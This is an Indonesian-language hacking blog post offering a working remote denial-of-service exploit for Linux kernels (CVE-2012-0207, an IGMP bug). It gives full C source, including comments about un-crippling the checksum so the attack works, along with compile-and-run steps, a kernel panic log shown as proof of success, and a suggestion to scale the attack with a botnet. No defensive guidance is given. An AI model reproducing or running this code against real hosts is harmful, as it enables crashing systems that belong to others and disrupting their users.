  1. Siapkan server / pc untuk mengcompile source ddos.
  2. Siapkan pc target linux, bisa random / yang memiliki kernel 2.6.36
  3. Memulai attack :)
Berikut adalah code DoS tools:
C
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
/*
** attacklinux.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** Credits to Ben Hutchings:
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./attacklinux SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
struct iphdr {
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
unsigned int options1;
unsigned int options2;
};
struct igmp_query {
unsigned char type;
unsigned char maxresponse;
unsigned short csum;
unsigned int mcast;
char padding[40];
};
// unsigned short in_chksum(unsigned short *, int); // removed by xd , thx for trying to cripple but no work
unsigned short in_chksum(unsigned short *addr, int len); // this was crippled, notice that this was uptop, so you dd not see the
// bugged up in_chksum wich wont make this works <img src="http://crazycoders.com/wp-includes/images/smilies/icon_smile.gif" alt=":)"> NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&amp;answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum &amp; 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
long resolve(char *);
long resolve(char *host) {
struct hostent *hst;
long addr;
hst = gethostbyname(host);
if (hst == NULL)
return(-1);
memcpy(&amp;addr, hst->h_addr, hst->h_length);
return(addr);
}
int main(int argc, char *argv[]) {
struct sockaddr_in dst;
struct iphdr *ip;
struct igmp_query *igmp;
long daddr, saddr;
int s, i=0, c, len, one=1;
char buf[1500];
if (argc < 3) {
printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
"credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not <img src="http://crazycoders.com/wp-includes/images/smilies/icon_razz.gif" alt=":P">
return(1);
}
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);
memset(buf, 0, 1500);
ip = (struct iphdr *)&amp;buf;
igmp = (struct igmp_query*)&amp;buf[sizeof(struct iphdr)];
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
ip->ihl = 7;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr)+8);
ip->id = htons(18277);
ip->frag_off=0;
ip->ttl = 1;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
ip->saddr = saddr;
ip->daddr = daddr;
ip->options1 = 0;
ip->options2 = 0;
igmp->type = 0x11;
igmp->maxresponse = 0xff;
igmp->mcast=inet_addr("0.0.0.0"); // mod here ,now we can attack the IP we actually put in
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 8);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&amp;buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&amp;dst,sizeof(struct sockaddr_in)) == -1) {
perror("Error sending packet");
exit(-1);
}
close(s);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
ip->id = htons(18278);
ip->tot_len = sizeof(struct iphdr)+12;
igmp->type = 0x11;
igmp->maxresponse = 0;
igmp->mcast=inet_addr("0.0.0.0");
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 12);
printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&amp;buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&amp;dst,sizeof(struct sockaddr_in)) == -1) {
perror("Error sending packet");
exit(-1);
}
return(0);
}
Cara menjalankannya adalah
  1. Simpan code di atas dengan nama file: dos-linux.c
  2. Compile source diatas menggunakan gcc: gcc dos-linux.c -o attacklinux
  3. Kemudian setelah selesai jalankan dengan perintah: ./attacklinux source_ip destination_ip , misal:./attacklinux 127.0.0.1 10.10.10.10
Download Source Code Toolsnya Disini:
Apabila berhasil, maka pada server akan tampil error log seperti berikut:
Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
binushacker $ gcc dos-linux.c -o attacklinux
binushacker $ ./attacklinux 127.0.0.1 10.10.10.10
[ 274.903179] netconsole: local IP 0.0.0.0
[ 274.903181] netconsole: interface 'eth0'
[ 274.903185] netconsole: remote IP 10.10.10.10
[ 274.903191] netconsole: local IP 127.0.0.1
[ 274.903244] console [netcon0] enabled
[ 274.903247] netconsole: network logging started
[ 283.360160] usb 4-2: new full speed USB device number 4 using uhci_hcd
[ 283.526265] usb 4-2: New USB device found, idVendor=0a5c, idProduct=2145
[ 283.526280] usb 4-2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 283.526289] usb 4-2: Product: ThinkPad Bluetooth with Enhanced Data Rate II
[ 283.526297] usb 4-2: Manufacturer: Lenovo Computer Corp
[ 2171.144135] usb 4-2: USB disconnect, device number 4
[ 2178.490539] wlan0: deauthenticating from 10.10.10.10 by local choice (reason=3)
[ 2178.506572] cfg80211: Calling CRDA to update world regulatory domain
[ 2178.523720] cfg80211: World regulatory domain updated:
[ 2178.523741] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[ 2178.523752] cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523762] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523772] cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523781] cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523791] cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 4622.662356] iwlagn 0000:03:00.0: L1 Disabled; Enabling L0S
[ 4622.662756] iwlagn 0000:03:00.0: Radio type=0x0-0x2-0x0
[ 4622.717229] ADDRCONF(NETDEV_UP): wlan0: link is not ready
[ 4630.334443] wlan0: authenticate with 10.10.10.10 (try 1)
[ 4630.336213] wlan0: authenticated
[ 4630.340174] wlan0: associate with 10.10.10.10 (try 1)
[ 4630.356310] wlan0: RX AssocResp from 10.10.10.10 (capab=0x431 status=0 aid=2)
[ 4630.356318] wlan0: associated
[ 4630.362820] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[ 4640.576058] wlan0: no IPv6 routers present
[ 7853.283020] Monitor-Mwait will be used to enter C-3 state
[ 7853.285825] thinkpad_acpi: EC reports that Thermal Table has changed
[16107.346657] thinkpad_acpi: EC reports that Thermal Table has changed
[16111.048524] divide error: 0000 [#1] SMP
[16111.048627] CPU 1
[16111.048664] Modules linked in: netconsole configfs ip6table_filter ip6_tables ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM acpi_cpufreq mperf iptable_mangle cpufreq_powersave cpufreq_conservative xt_tcpudp iptable_filter cpufreq_stats ip_tables x_tables cpufreq_userspace bridge stp parport_pc ppdev lp parport bnep rfcomm binfmt_misc deflate ctr twofish_generic twofish_x86_64 twofish_common camellia serpent blowfish cast5 des_generic xcbc rmd160 sha512_generic sha1_generic hmac crypto_null af_key ext2 fuse loop kvm_intel kvm ecb btusb bluetooth snd_hda_codec_conexant crc16 uvcvideo videodev snd_hda_intel media cdc_ether snd_hda_codec v4l2_compat_ioctl32 usbnet cdc_acm mii snd_hwdep cdc_wdm arc4 snd_pcm_oss snd_mixer_oss snd_pcm thinkpad_acpi snd_seq_midi snd_rawmidi iwlagn snd_seq_midi_event mac80211 cfg80211 snd_seq snd_timer snd_seq_device iTCO_wdt i2c_i801 snd snd_page_alloc iTCO_vendor_support rfkill i915 drm_kms_helper drm soundcore i2c_algo_bit tpm_tis psmouse tpm i2c_core wmi battery pcspkr tpm_bios ac nvram power_supply evdev serio_raw video processor button ext3 jbd mbcache btrfs zlib_deflate crc32c libcrc32c cbc dm_snapshot dm_mirror dm_region_hash dm_log dm_crypt dm_mod cryptd aes_x86_64 aes_generic sha256_generic sd_mod crc_t10dif uhci_hcd ata_generic thermal thermal_sys ahci libahci ehci_hcd libata e1000e scsi_mod usbcore [last unloaded: scsi_wait_scan]
[16111.051698]
[16111.051732] Pid: 5416, comm: NetworkManager Not tainted 3.1.0-1-amd64 #1 LENOVO 74663RG/74663RG
[16111.051888] RIP: 0010:[<ffffffff812bf78c>] [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP: 0018:ffff88013bc83ab0 EFLAGS: 00010246
[16111.052013] RAX: 000000000efb921d RBX: ffff8801347932c0 RCX: 00000001003c507a
[16111.052013] RDX: 0000000000000000 RSI: 0000000056000000 RDI: ffff8801347932f8
[16111.052013] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[16111.052013] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801363ca480
[16111.052013] R13: 00000000fb0000e0 R14: 0000000000000000 R15: 0000000000000000
[16111.052013] FS: 00007f3909c057e0(0000) GS:ffff88013bc80000(0000) knlGS:0000000000000000
[16111.052013] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[16111.052013] CR2: 00007f3906e2449b CR3: 00000001097a2000 CR4: 00000000000006e0
[16111.052013] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[16111.052013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[16111.052013] Process NetworkManager (pid: 5416, threadinfo ffff880116fe0000, task ffff8800af283510)
[16111.052013] Stack:
[16111.052013] ffff8801347932f8 ffff8801347932c0 ffff8800373cc3c0 ffffffff812c166e
[16111.052013] 0000000000000000 ffff8801347932f8 ffff880134793350 0000000000000000
[16111.052013] 0002000000000000 ffff8800373cc3c0 ffffffff817f8280 0000000000000002
[16111.052013] Call Trace:
[16111.052013] <IRQ>
[16111.052013] [<ffffffff812c166e>] ? igmp_rcv+0x480/0x515
[16111.052013] [<ffffffff81297cdf>] ? ip_local_deliver_finish+0x137/0x1a4
[16111.052013] [<ffffffff8126f54f>] ? __netif_receive_skb+0x3e3/0x415
[16111.052013] [<ffffffff81270dc0>] ? netif_receive_skb+0x63/0x69
[16111.052013] [<ffffffffa03c4775>] ? ieee80211_frame_allowed+0x68/0xc3 [mac80211]
[16111.052013] [<ffffffffa03c4b33>] ? ieee80211_deliver_skb+0xbb/0xf1 [mac80211]
[16111.052013] [<ffffffffa03c5d67>] ? ieee80211_rx_handlers+0xf19/0x1755 [mac80211]
[16111.052013] [<ffffffff81291f5d>] ? nf_iterate+0x41/0x77
[16111.052013] [<ffffffff81297804>] ? inet_del_protocol+0x27/0x27
[16111.052013] [<ffffffffa03c6d15>] ? ieee80211_prepare_and_rx_handle+0x772/0x7ca [mac80211]
[16111.052013] [<ffffffffa03c7440>] ? ieee80211_rx+0x6d3/0x6f8 [mac80211]
[16111.052013] [<ffffffffa03f04b6>] ? iwl_rx_reply_rx+0x429/0x441 [iwlagn]
[16111.052013] [<ffffffff811acff2>] ? is_swiotlb_buffer+0x23/0x2f
[16111.052013] [<ffffffffa03f61b4>] ? iwl_irq_tasklet+0x3cb/0x645 [iwlagn]
[16111.052013] [<ffffffff8104afe0>] ? raise_softirq_irqoff+0x6/0x25
[16111.052013] [<ffffffff8104a52a>] ? tasklet_action+0x73/0xc2
[16111.052013] [<ffffffff8104ad14>] ? __do_softirq+0xb9/0x177
[16111.052013] [<ffffffff81334a2c>] ? call_softirq+0x1c/0x30
[16111.052013] [<ffffffff8100f845>] ? do_softirq+0x3c/0x7b
[16111.052013] [<ffffffff8104af7c>] ? irq_exit+0x3c/0x9a
[16111.052013] [<ffffffff8100f575>] ? do_IRQ+0x82/0x98
[16111.052013] [<ffffffff8132db2e>] ? common_interrupt+0x6e/0x6e
[16111.052013] <EOI>
[16111.052013] [<ffffffff810b6195>] ? get_page_from_freelist+0x2b2/0x665
[16111.052013] [<ffffffff810b6043>] ? get_page_from_freelist+0x160/0x665
[16111.052013] [<ffffffff810b67d4>] ? __alloc_pages_nodemask+0x12b/0x748
[16111.052013] [<ffffffff810b6d89>] ? __alloc_pages_nodemask+0x6e0/0x748
[16111.052013] [<ffffffff810df014>] ? alloc_pages_current+0xb2/0xcc
[16111.052013] [<ffffffff8102f6fd>] ? pte_alloc_one+0x11/0x39
[16111.052013] [<ffffffff810ca1c6>] ? __pte_alloc+0x19/0x11e
[16111.052013] [<ffffffff810cc42e>] ? handle_mm_fault+0x18d/0x1ea
[16111.052013] [<ffffffff813307c0>] ? do_page_fault+0x312/0x337
[16111.052013] [<ffffffff810b9389>] ? put_page+0x18/0x27
[16111.052013] [<ffffffff810ca93b>] ? do_wp_page+0x551/0x563
[16111.052013] [<ffffffff810cc0b7>] ? handle_pte_fault+0x739/0x79f
[16111.052013] [<ffffffff8132ddf5>] ? page_fault+0x25/0x30
[16111.052013] [<ffffffff811a2ca3>] ? __strncpy_from_user+0x32/0x48
[16111.052013] [<ffffffff811a2c89>] ? __strncpy_from_user+0x18/0x48
[16111.052013] [<ffffffff810fc331>] ? getname_flags+0x152/0x1d7
[16111.052013] [<ffffffff810148a5>] ? sys_execve+0x1a/0x54
[16111.052013] [<ffffffff81332c2c>] ? stub_execve+0x6c/0xc0
[16111.052013] Code: 0c 58 48 8d 7b 08 5b 5d e9 5a f8 ff ff 58 5b 5d c3 55 89 f5 53 48 89 fb 52 e8 b4 3d ee ff 31 d2 48 8b 0d 78 08 3d 00 48 8d 7b 38 <f7> f5 c6 83 94 00 00 00 01 48 63 d2 48 8d 74 11 02 e8 bb 24 d9
[16111.052013] RIP [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP <ffff88013bc83ab0>
[16111.168911] ---[ end trace 3945f5f1af3c1493 ]---
[16111.168922] Kernel panic - not syncing: Fatal exception in interrupt
[16111.171624] Pid: 5416, comm: NetworkManager Tainted: G D 3.1.0-1-amd64 #1
[16111.174416] Call Trace:
binushacker $
DoS dengan IGMP ini juga bisa dilakukan di DDOS, apabila kalian memiliki BOTNET :)
Selamat mencoba semoga berhasil..
 

Popular Posts